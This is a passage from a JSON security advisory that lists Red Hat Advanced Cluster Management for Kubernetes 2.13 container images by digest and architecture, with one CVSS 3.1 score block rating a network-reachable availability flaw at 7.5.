"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:b30887b0c8fb4292b6c87ef681761c18a112e0113647e2bde86c04c13f59b7a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6b65f79a765b69a84ac5924280e9f6d55875b8aceb6ae97f9a75cb6076bd074a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6d410e7e4de91970f44368e5cc1ce1ac83908550785263342f6038a988be30e4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:736631a4d89bf44078b7f180ddcd474655d66ed43b85a4a79258eab9348656ff_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:ca58b27ea6673f0c506ed1ffad51918608a813dabf58f4845ab97d6e9f2c11d3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:21f6d86d21be3a9541fc577a647d8f38b81bca975dc82d9506056f44e6a35443_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:60a3e7e83d189003d185e2415f96b4f3be0912e4cbaa96ea4ed8ebcdce5cc1d0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:796abebd9573cacba87eb0c6497ed9617047eddba90f1c4b8237964ed954328d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:d130f2bb5b047483504d5c8113e0449983e79c49e8bda97b5752862930a91947_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:0a98f4d3e54b7410bfc1601f2ee2ba1308f30e40314bfc5169c3d99c3b8dfaa1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:3148a9662d732bbad15d6bd89cce43a886cba68ba1cefcef55f7bb65d3159432_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33c37b7bd401cfcf46d5cb42173fe3697a0649dc1080255dbd6243d4bfe8d08f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:cf1c1c1c778cafe6067df490969aab89a6b3e43487d954bb24b1409bc22f1091_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:118fe4fc31cb7818cda240c48628e5a3d43002c271fa7ba45d9631b7a6ddb8e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a2e5353298e0b0e46516d5127d0da65fcb5ac4498651693f347de1eb18e12095_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b10f9f52f0665ae2a8bb4bf2649aa6e3d1185a0dffb9ebeb11a8900174df5ef2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:c2bfb459d7442878d591cc31436830b983fe30dcfa6f7d383cc91cb32e42fa7c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:55320965b17fef48e776d39c548f0bf81a1e9239ee4b90a032f4b111e8748d2f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:a36bcef862d0e3cc972c9eb2c0d80311030659c13de6acab7e353905ff5eccff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:c7bfe530a7efe66f5c3e2e08b114b3b9e44072e3609725663d6a5f3945bda512_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:e73d91e157c13ea96615fc060f5312997203f6b6350d335917b2feacb96c9ca5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2003587575e18b2e6b9bf3617c65e0f83ebc8cf30daf6dd241500cd1555820e0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:6098254a7e2fdd67ef1773abda74d3dde3d31e59254f4a1cd5e77dc34d224602_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:7fa35da009ab6e41177f0589f6d3fbf1bbe3fff4b52add3bfbc516a046e35640_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:9418993b725bf813959ed5adbd21690ee2cbeeac3d56c7ab6805c3eb29b5d46f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:14fb16412dea57a775e95954c3a07a77de846f851935629bf9bfdbcc46a70f4f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:40f8ad6430cc767b56992722d5890f98882c7372950320d28e808c18714b7179_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:c227f25ae401af3eba9352765f906c8b873370485a7c748b1602e53c0776f90f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:ffb3e3cd6764e802b5e9f87034548f96dcacfeedd8fe2b3b21b06c41734e8320_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:24df1e0d7850220df3aa658c6056f81a68fe451ffd99e4d0dfee07cebe9c3782_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:25fb42a78847235c61e35f66a6e02dfee5fc0b6832aa4ce06c3c6f395b95b36d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9e19fc6fd3285c1833cd97eeef10cb179fe9705dea9b3f912052207b3a2daea7_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:edc8b960038279c012c5aa99917361ad0888b0195c3ee9adb368b798a5bea2fb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:231caddbaa1b499fae4efbf34c839941e595f242d12e22378e210b47de6262a8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:450199903a5d88d10b107768839780fbd0ee15535c6a998a0cac5bec942dd414_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:7fe0726987e478ed3da6d9b1eb4b611461e285ada827de6a186b95bc75a36c73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:8d8eb1e5a21a37f041f60fbd624c7861f2e726997c6ad1d5279f59a7c849f2af_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1628ce0aab57c09dad7f5b2a24bf664de71b76a38cd05ccf281bb8cc8fc5859e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e3f01077df87eb91ece7c2bd6cfa2c15a0044c2f9c40efee9ce1bf14a6807b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9bc74577f0edc3045a1a027c0f8652cc904fc3b9397dc9af10576f9dfcab2080_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:e9cab985b52c8f23b62cad3ea9c692e321a5347bd06fc56b19dfdb1801030567_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:01778cb2a2b9771a03ed8c7feb5b94a23225f60f4e49263e71dccd017cfd1164_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:0e4525617200428a5510108b0a0845fde43fd4e64804186af045df9680ca05b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:903c920eb068fcabdd16fb95f78902107892efa8e8a1ddda124d7f6bc1afdcd8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:ac486bf6a84c573a9774aadd4ea995a551c0abcbfb42dbbb71dc03e6c900a211_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:61b112b8ebb2ca4e41f5ee4b0c09ad0b53c3a6b60297fb8c1f158c28a8f10b3d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:6bd79f2c4c516adc626c73dec28892cbeab65e349dff8f1fcb11d7242b614805_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:c920a77dcf02347d116035d5cfef1a365e02022713788a14045a9be2a1bd1c5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:eb7788d29142ad36cba099b1dcebe3eb1c28366f87f611ca4d0b375bc7f4b19d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5b7668d6f3b7fb994c4bbbb86bdb92d4258b88ab92337394b66058255c048ad8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:64930ec82f003294eaf26f6ac59c493e1bfc8c3d7addeb4c5b8f0cfcf458c406_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:753415fcdcc9f6b8685a54d83f4d35d1104d690215125a36d6df2b9873ac6cd3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:c58049e17034c0df635df55fce49cab392af3194f57c03bbb842d7c2acb247e5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0907a51a72f39393da4bdee241333b08b5b5591f1e9a5de7d67ad586d11da59b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:498cdf1888c2ef9f031baafc288323ebd0fe5d9b009cedb1443605cf4153c0c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5ac47e52a78f31b8982de5b9144ec96baab80c78ba8d06d3efabda329e017d36_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:9819517abcb75b516ea0e158ad9cbb0a4ef847f7858531b751c04de5a53527be_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:2ae0730de393d5aeff08a9317fc70459421dd8d6fc7a65f2a9e4a28ae5b64d9d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:62c7b78b2726fd940db4bd435b13f6d07097395b069130b32ea0912c95333555_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8c986374ff8afd980f450877facc2927fdd6f655f3d6b7def6771485d00afeb1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8eeb6a344b773bdc4f50da36c956dbaa50d6474f5c045e92250274d0ed723b39_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:1d7f37fa0146f48291fd1dd12752d0a19c8e87c30e1698492b36274c79051a9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:5c3cc196a8638f6fae7c246ff6746f2f453bbfab8e018683ee297609713664ac_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:e539ec4ab10e81c08d68991e3c77efd43497f4a5561ee1315ff8d467736d245a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:fbc20e8545d4562d05df98d5cfbc91a7a2d802a9d4ff8c0ea733126687c42c26_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:111bbc8fda153d16c384a622dd659c53b8cdc47e495a9fada411a5042954ab6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:433f0b3d09889613d5214ba1c084bdc99bdcbce227fefd10b0d8491442698ea9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:51096baed7d6ed403d88ac2dd935a30313f618b7552fee2b07367db5069601d1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:b3eefeffd90660b8e463f2b06dc5ee2b46e235efae7c13ed893828a6c9598459_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:58a8acff99aaaacdb7c292b615c2ed9a0418d82f75273c1809a6db05811713fa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:661a4a1fb71f36ac1663232ca6e098d1c101dc16168eec7eee471ae11f98f66c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bc06192ce81eac533cb7c080e8aef6587991534cb9b1787537c49753c0985e3d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:e8207895ec9e7006746043cf04fbf1e2897aa30e74b9184665be2ac50f9fe650_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:3074a430dd8bbb0399ce649186cb6140d8525e5b7c1e05b79a4ab74a32d989b8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:34de933b36ee01444cdf4d4a45e47466ef8dad6ab6345134524595c191928ffe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:8a65d646180c7889d0ba1e3a11fd6796d0020301e4e721575f87585afd8f9dfe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:cf1b6cae5a10aec88554e71be094737b0a17efb07cd1175ca55f1799626f58f2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:036ee3882d4d6536c309d9aacea3dc611785deba3bd998092adcb1ba21664897_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:82914e82513e2f8522589886a5df6681d12c6442ff1b8ef05a21d31c09fa0f0d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:893831b7270214137b2fdf1e55f0175b4ef6de9b8763eaaf0e0a935c8ab1744d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d6e329af2d9c1648006e3fa0b0232562a2bed6e7a33c56e025517f7d9068b5cc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:131918c9878d040c3ec190a9c724a65dbf3bb27f55a0fcac250d92067dc69288_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:327af8db145b9bd6ada1c9f27faa493ce090af412c51dedd7b247e65dcad51fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:721ebc57b91b4f9bcfb25d7b29ee8a2ca60fcb231096af2812f9201778e3ca51_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:ebff3dd368f33d1aec215b947b88f4aa7e821db1577d448b8c6eb4e6ead7fe07_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:6a88ce891e0fc9619e983a5b63fef86f735b8df5eb56909075bd3bbb098dddf8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:7485348cced991c7a4399e21e077ed62b3a118b7093bd4f42f9863d9e0da5c26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:b8d70910405eec4d886b27fc348a982c0b6f906f7f0e65aceecffd9f09fd6602_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:e63891386bfb191cd0e74884cad1f86c462d57e51b9aeec7d9c5073ba4d723f9_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:01382838a23f75a6c03b30c68e9e42d72c22d773a4891260c639f7c8b60ffd87_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:1c74aaa66b6be9f5eb1f55851f1cc3f2a3878882c3fc972cd24232e9022f74e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:696d1f7c4b5415e49760f7a66368aa0260284b12b108d5feb560838a9bce8a6f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7328602aa637f1b555ecd56c05d6ade8dbee48fae78a0118b1e39774b8383704_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:3ae25beb920ec77de14769895f60da6a3d83fc41192ca5da5f976076853e5a50_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:c9bf774dfa3f5a66339a86f22961c54b2b41199efd173b016a2c7c57407dae40_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:d1cac9d50ec20e770ae41aa8f90474c269d80e84a9990e2c3e613a892b0c044c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:ddb5d8c476bcc9b6d4a7c0d116a2f5150acbfa80cc890d77d5d90bd496a7860e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:0ffd5a902860aad15377e20b1e6481e6cf746fa3e33509df0f88f93f9a9f8034_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:abcf4d6f42dec254d8b4197282fb449daf13d4724ed23ddc2aafde0328338f74_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b6ea1f6389ad207c45321ab5a36c03949986e74ef9dbf5e3d2fdb2ceb5c4a602_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:e126327d69e48f2844f5beafc34514d31e9f3eed0ac393399edf80cf31a2eabe_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:0f7b1ee143f154e6e33c452f95fd0a0afb7fd020e758a991d18abde990e49e0c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6363dfb96f394aef2b07b3a36c85d3af60dc3594ab615327176ba520704a4356_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:849cf23afa514a1d86073fed2424e487893655510721a0b9c0d4be4cf59bf60b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:a8843c7b628767803f2aa4b2658dc0a932157b20f98507004929036108c7dfb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:428a52072881ee7714539f7721313ca78e06fd0e39ceb8de12f8a0d33fb4cd55_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:5145c15e9fa57bdd1d072e7c88f27d5f8f51caf395e542ad8fb54a098f8c24fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:cb76c81b895dfb5bc384407baf76c5c74d9b509342e665f3d5ff234a40f16236_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:d7dae765d402cd9522c23689fc0e72f47659fc2f1184b8b16c51b6c5c6a2b890_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5af546f1d36b01b320fd950d227cdd8f62a765facc8614ba277fe218c5649e61_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:921a7995304e4648ac2fd0c08bec7d95adc09caca4d6d124cbba4ff8043edf19_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:a0928fa238b82f2c00778064d0f1e52ff507ffef7a0a3756b1f2f2022d375e4b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:fdc436ea03cb2d06976da109061aa0793672c306deef23708ee9e0b39395b6f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:2adb87f4433d9516e2111150bccafbbb8dec179bdf3fe3acd38d7b27411cb666_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:4afad9568dc7dd2d90c396d08d596258e813bb67e2901135b539f279af382e09_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:508d4d8ee312e8d720eeca38f3823438548c5ab1260d8fa822ca49765f7aeef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:a31ab1ae8b4c3ead24f9ce3c913a4754972bd548d6e5b10ca22e61a6d9d3539a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:35ba01a14b8f7a0ed0e79fd9efe48280d26afa10a316daaec512f39cc6839adb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:384d23bb3f4e6fd2425e1b60ded99f027dcbaad14e631ffbe84845821a1c3215_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:a8ca367caa43ec006811fe370fdf440328dd22fc39be11e48f36396b781f36bb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:db8b5776a9dcb4b87a4de948c4c11d0164e66df188f97be6a6fd7e9953f5501e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:1e0a1eadbb77f4f14d48357af6a5b12406ae912210b53c14018b642e4f62d1fe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:4816e73043b8f73143cff29cff41292e62bb36467ba28a260ee46fd43ece915c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71d6b8f5471d7a23918763eeea53d991d98adf170e228348b77d2412ce752751_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:87f2e1ee942b226835c97b7abe43a62802146755141a850137b9ab03dd6fccf6_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:2b6a43ae23126321b9c94b37da646db4943331200434edc6a54be156150065f2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:d24283b13f739561fae6bdfb730922a1d3804422dc41249e33e6084158afcec4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:e9df0b0323447cacad8942ecce2e690a9f498d5cb41b54e3bb55be6614ddaece_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:ed46808dba295cf093aa5caabc9782ee9f044c7e770adaf3657f57f0f6e1aaf9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:5a98450b5f85a75172ca51e2dcf096465635dc2e4c5fedfd74e1fdd665f3fa65_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:7388c812f31ff8f2b1c2653adf07906e2f50c356a1ad9130d3923d835e79e0e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:bd521270153c8b5b8193e08fe4a7c959e5b9d22ed7e74a87827580974b3836f1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fc3b40899a332c041667de0965d58f50325eaddc8547145a2dff9aede38d69bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0668bbb16723e23ae64e4337a1347a6e0d2854d1c173cbc59c17a829e430bc00_s390x",
